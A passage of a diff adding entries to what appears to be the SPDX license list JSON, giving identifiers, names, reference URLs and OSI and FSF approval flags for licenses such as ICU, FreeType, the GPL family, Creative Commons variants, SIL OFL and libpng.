+ "name": "ICU License",
+ "licenseId": "ICU",
+ "seeAlso": [
+ "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FTL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FTL.json",
+ "referenceNumber": 260,
+ "name": "Freetype Project License",
+ "licenseId": "FTL",
+ "seeAlso": [
+ "http://freetype.fis.uniroma2.it/FTL.TXT",
+ "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
+ "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MirOS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MirOS.json",
+ "referenceNumber": 261,
+ "name": "The MirOS Licence",
+ "licenseId": "MirOS",
+ "seeAlso": [
+ "https://opensource.org/licenses/MirOS"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
+ "referenceNumber": 262,
+ "name": "BSD 2-Clause NetBSD License",
+ "licenseId": "BSD-2-Clause-NetBSD",
+ "seeAlso": [
+ "http://www.netbsd.org/about/redistribution.html#default"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
+ "referenceNumber": 263,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-NC-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
+ "referenceNumber": 264,
+ "name": "OSET Public License version 2.1",
+ "licenseId": "OSET-PL-2.1",
+ "seeAlso": [
+ "http://www.osetfoundation.org/public-license",
+ "https://opensource.org/licenses/OPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
+ "referenceNumber": 265,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
+ "licenseId": "CC-BY-NC-ND-2.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SISSL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
+ "referenceNumber": 266,
+ "name": "Sun Industry Standards Source License v1.2",
+ "licenseId": "SISSL-1.2",
+ "seeAlso": [
+ "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Wsuipa.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
+ "referenceNumber": 267,
+ "name": "Wsuipa License",
+ "licenseId": "Wsuipa",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Wsuipa"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
+ "referenceNumber": 268,
+ "name": "Zimbra Public License v1.4",
+ "licenseId": "Zimbra-1.4",
+ "seeAlso": [
+ "http://www.zimbra.com/legal/zimbra-public-license-1-4"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
+ "referenceNumber": 269,
+ "name": "Linux Kernel Variant of OpenIB.org license",
+ "licenseId": "Linux-OpenIB",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
+ "referenceNumber": 270,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
+ "referenceNumber": 271,
+ "name": "Open LDAP Public License v2.5",
+ "licenseId": "OLDAP-2.5",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMPAS.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
+ "referenceNumber": 272,
+ "name": "Academy of Motion Picture Arts and Sciences BSD",
+ "licenseId": "AMPAS",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
+ "referenceNumber": 273,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BUSL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
+ "referenceNumber": 274,
+ "name": "Business Source License 1.1",
+ "licenseId": "BUSL-1.1",
+ "seeAlso": [
+ "https://mariadb.com/bsl11/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
+ "referenceNumber": 275,
+ "name": "Adobe Glyph List License",
+ "licenseId": "Adobe-Glyph",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/0BSD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/0BSD.json",
+ "referenceNumber": 276,
+ "name": "BSD Zero Clause License",
+ "licenseId": "0BSD",
+ "seeAlso": [
+ "http://landley.net/toybox/license.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/W3C-19980720.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
+ "referenceNumber": 277,
+ "name": "W3C Software Notice and License (1998-07-20)",
+ "licenseId": "W3C-19980720",
+ "seeAlso": [
+ "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/FSFUL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
+ "referenceNumber": 278,
+ "name": "FSF Unlimited License",
+ "licenseId": "FSFUL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
+ "referenceNumber": 279,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
+ "licenseId": "CC-BY-NC-SA-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/DOC.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/DOC.json",
+ "referenceNumber": 280,
+ "name": "DOC License",
+ "licenseId": "DOC",
+ "seeAlso": [
+ "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
+ "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/TMate.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TMate.json",
+ "referenceNumber": 281,
+ "name": "TMate Open Source License",
+ "licenseId": "TMate",
+ "seeAlso": [
+ "http://svnkit.com/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-open-group.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
+ "referenceNumber": 282,
+ "name": "MIT Open Group variant",
+ "licenseId": "MIT-open-group",
+ "seeAlso": [
+ "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
+ "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AMDPLPA.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
+ "referenceNumber": 283,
+ "name": "AMD\u0027s plpa_map.c License",
+ "licenseId": "AMDPLPA",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Condor-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
+ "referenceNumber": 284,
+ "name": "Condor Public License v1.1",
+ "licenseId": "Condor-1.1",
+ "seeAlso": [
+ "http://research.cs.wisc.edu/condor/license.html#condor",
+ "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
+ "referenceNumber": 285,
+ "name": "PolyForm Noncommercial License 1.0.0",
+ "licenseId": "PolyForm-Noncommercial-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/noncommercial/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
+ "referenceNumber": 286,
+ "name": "BSD 3-Clause No Military License",
+ "licenseId": "BSD-3-Clause-No-Military-License",
+ "seeAlso": [
+ "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
+ "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
+ "referenceNumber": 287,
+ "name": "Creative Commons Attribution 4.0 International",
+ "licenseId": "CC-BY-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by/4.0/legalcode"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
+ "referenceNumber": 288,
+ "name": "Open Government Licence - Canada",
+ "licenseId": "OGL-Canada-2.0",
+ "seeAlso": [
+ "https://open.canada.ca/en/open-government-licence-canada"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
+ "referenceNumber": 289,
+ "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
+ "licenseId": "CC-BY-NC-SA-3.0-IGO",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EFL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
+ "referenceNumber": 290,
+ "name": "Eiffel Forum License v1.0",
+ "licenseId": "EFL-1.0",
+ "seeAlso": [
+ "http://www.eiffel-nice.org/license/forum.txt",
+ "https://opensource.org/licenses/EFL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Newsletr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
+ "referenceNumber": 291,
+ "name": "Newsletr License",
+ "licenseId": "Newsletr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Newsletr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
+ "referenceNumber": 292,
+ "name": "copyleft-next 0.3.0",
+ "licenseId": "copyleft-next-0.3.0",
+ "seeAlso": [
+ "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
+ "referenceNumber": 293,
+ "name": "GNU General Public License v3.0 or later",
+ "licenseId": "GPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
+ "referenceNumber": 294,
+ "name": "Community Data License Agreement Permissive 2.0",
+ "licenseId": "CDLA-Permissive-2.0",
+ "seeAlso": [
+ "https://cdla.dev/permissive-2-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
+ "referenceNumber": 295,
+ "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
+ "licenseId": "CC-BY-ND-3.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
+ "referenceNumber": 296,
+ "name": "Computational Use of Data Agreement v1.0",
+ "licenseId": "C-UDA-1.0",
+ "seeAlso": [
+ "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
+ "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Barr.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Barr.json",
+ "referenceNumber": 297,
+ "name": "Barr License",
+ "licenseId": "Barr",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Barr"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Vim.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Vim.json",
+ "referenceNumber": 298,
+ "name": "Vim License",
+ "licenseId": "Vim",
+ "seeAlso": [
+ "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
+ "referenceNumber": 299,
+ "name": "GNU General Public License v2.0 w/Classpath exception",
+ "licenseId": "GPL-2.0-with-classpath-exception",
+ "seeAlso": [
+ "https://www.gnu.org/software/classpath/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
+ "referenceNumber": 300,
+ "name": "BitTorrent Open Source License v1.1",
+ "licenseId": "BitTorrent-1.1",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
+ "referenceNumber": 301,
+ "name": "Common Documentation License 1.0",
+ "licenseId": "CDL-1.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/cdl/",
+ "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
+ "https://www.gnu.org/licenses/license-list.html#ACDL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
+ "referenceNumber": 302,
+ "name": "Creative Commons Attribution Share Alike 1.0 Generic",
+ "licenseId": "CC-BY-SA-1.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ADSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ADSL.json",
+ "referenceNumber": 303,
+ "name": "Amazon Digital Services License",
+ "licenseId": "ADSL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PostgreSQL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
+ "referenceNumber": 304,
+ "name": "PostgreSQL License",
+ "licenseId": "PostgreSQL",
+ "seeAlso": [
+ "http://www.postgresql.org/about/licence",
+ "https://opensource.org/licenses/PostgreSQL"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
+ "referenceNumber": 305,
+ "name": "SIL Open Font License 1.1",
+ "licenseId": "OFL-1.1",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
+ "referenceNumber": 306,
+ "name": "Netscape Public License v1.0",
+ "licenseId": "NPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/NPL/1.0/"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/xinetd.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/xinetd.json",
+ "referenceNumber": 307,
+ "name": "xinetd License",
+ "licenseId": "xinetd",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
+ "referenceNumber": 308,
+ "name": "GNU Library General Public License v2 only",
+ "licenseId": "LGPL-2.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
+ "referenceNumber": 309,
+ "name": "zlib/libpng License with Acknowledgement",
+ "licenseId": "zlib-acknowledgement",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
+ "referenceNumber": 310,
+ "name": "Open LDAP Public License v2.2.1",
+ "licenseId": "OLDAP-2.2.1",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
+ "referenceNumber": 311,
+ "name": "Apple Public Source License 1.0",
+ "licenseId": "APSL-1.0",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
+ "referenceNumber": 312,
+ "name": "Lawrence Berkeley National Labs BSD variant license",
+ "licenseId": "BSD-3-Clause-LBNL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GLWTPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
+ "referenceNumber": 313,
+ "name": "Good Luck With That Public License",
+ "licenseId": "GLWTPL",
+ "seeAlso": [
+ "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
+ "referenceNumber": 314,
+ "name": "GNU Lesser General Public License v3.0 only",
+ "licenseId": "LGPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGC-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
+ "referenceNumber": 315,
+ "name": "OGC Software License, Version 1.0",
+ "licenseId": "OGC-1.0",
+ "seeAlso": [
+ "https://www.ogc.org/ogc/software/1.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Dotseqn.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
+ "referenceNumber": 316,
+ "name": "Dotseqn License",
+ "licenseId": "Dotseqn",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Dotseqn"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MakeIndex.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
+ "referenceNumber": 317,
+ "name": "MakeIndex License",
+ "licenseId": "MakeIndex",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MakeIndex"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
+ "referenceNumber": 318,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
+ "referenceNumber": 319,
+ "name": "BSD 3-Clause No Nuclear License 2014",
+ "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
+ "seeAlso": [
+ "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
+ "referenceNumber": 320,
+ "name": "GNU General Public License v1.0 only",
+ "licenseId": "GPL-1.0-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IJG.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IJG.json",
+ "referenceNumber": 321,
+ "name": "Independent JPEG Group License",
+ "licenseId": "IJG",
+ "seeAlso": [
+ "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
+ "referenceNumber": 322,
+ "name": "Affero General Public License v1.0 or later",
+ "licenseId": "AGPL-1.0-or-later",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
+ "referenceNumber": 323,
+ "name": "SIL Open Font License 1.1 with no Reserved Font Name",
+ "licenseId": "OFL-1.1-no-RFN",
+ "seeAlso": [
+ "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
+ "https://opensource.org/licenses/OFL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
+ "referenceNumber": 324,
+ "name": "Boost Software License 1.0",
+ "licenseId": "BSL-1.0",
+ "seeAlso": [
+ "http://www.boost.org/LICENSE_1_0.txt",
+ "https://opensource.org/licenses/BSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Libpng.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Libpng.json",
+ "referenceNumber": 325,
+ "name": "libpng License",
+ "licenseId": "Libpng",
